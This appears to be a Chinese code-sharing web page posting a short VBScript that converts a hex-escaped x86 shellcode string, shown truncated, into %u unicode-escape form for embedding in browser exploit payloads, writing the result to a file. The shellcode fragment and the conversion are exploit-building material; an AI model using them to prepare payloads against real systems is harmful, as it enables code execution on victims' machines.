欢迎来到代码驿站!

VBS

当前位置:首页 > 脚本语言 > VBS

vbs shellcode转换escape加密

时间:2021-09-17 09:39:57|栏目:VBS|点击:
'code by NetPatch

code="\x29\xc9\x83\xe9\xa1\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x92\x06\x5b\x18\x83\xeb\xfc\xe2\xf4\x79\x16\x01\x52\xa1\xcf\x3d\xa1\xae\x07\xdb\x2c\x98\x9f\xb9\xe2\x79\x03\xb3\xf3\x6d\xf9\xa4\x68\xde\x9f\xc2\x81\x51\xfb\x63\xb1\x0b\x9f\xc2\x0a\x4b\x93\x49\xf1\x17\x32\x49\xc1\x03\x14\x1a\x0a\x78\xa3\…………………………"
function replaceregex(str) 
set regex=new regExp 
regex.pattern="\\x(..)\\x(..)"
regex.IgnoreCase=true 
regex.global=true 
matches=regex.replace(str,"%u$2$1") 
replaceregex=matches 
end Function
set fso=CreateObject("scripting.filesystemobject")
set fileS=fso.opentextfile("a.txt",8,true)
fileS.writeline replaceregex(code)
files.close
set fso=nothing

上一篇:Windows管理脚本学习

栏    目:VBS

下一篇:VBS 十六进制异或加密实现代码

本文标题:vbs shellcode转换escape加密

本文地址:http://www.codeinn.net/misctech/175734.html

推荐教程

广告投放 | 联系我们 | 版权申明

重要申明:本站所有的文章、图片、评论等,均由网友发表或上传并维护或收集自网络,属个人行为,与本站立场无关。

如果侵犯了您的权利,请与我们联系,我们将在24小时内进行处理、任何非本站因素导致的法律后果,本站均不负任何责任。

联系QQ:914707363 | 邮箱:codeinn#126.com(#换成@)

Copyright © 2020 代码驿站 版权所有